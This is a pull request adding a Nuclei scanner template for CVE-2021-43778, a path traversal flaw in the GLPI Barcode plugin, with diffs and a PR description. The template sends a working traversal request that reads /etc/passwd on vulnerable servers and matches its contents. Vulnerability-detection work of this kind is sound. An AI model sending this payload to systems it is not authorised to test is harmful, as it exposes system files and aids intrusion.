### PR TITLE
add CVE-2021-43778.yaml

### DIFF
--- a/cves/2021/CVE-2021-43778.yaml
+++ b/cves/2021/CVE-2021-43778.yaml
@@ -6,26 +6,25 @@ info:
   severity: critical
   description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
   reference:
+    - https://github.com/AK-blank/CVE-2021-43778
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
     cve-id: CVE-2021-43778
-  tags: GLPI, Barcode
+  tags: glpi,cve,cve2021,lfi
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
-    headers:
-      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
 
+    matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
 
       - type: regex
-        name: LFI
         regex:
           - "root:.*:0:0"

--- a/cves/2021/CVE-2021-43778.yaml
+++ b/cves/2021/CVE-2021-43778.yaml
@@ -1,0 +1,31 @@
+id: CVE-2021-43778
+
+info:
+  name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
+  author: cckuailong
+  severity: critical
+  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2021-43778
+  tags: GLPI, Barcode
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
+    headers:
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        name: LFI
+        regex:
+          - "root:.*:0:0"


### PR DESCRIPTION
### Template / PR Information

GLPI plugin Barcode < 2.6.1 path traversal vulnerability

- Fixed CVE-2021-43778
- References: https://nvd.nist.gov/vuln/detail/CVE-2021-43778

### Template Validation

I've validated this template locally?
- [ Yes] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

![image](https://user-images.githubusercontent.com/10824150/144187824-d3584afd-14b6-4832-b337-56575c32e8f6.png)


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)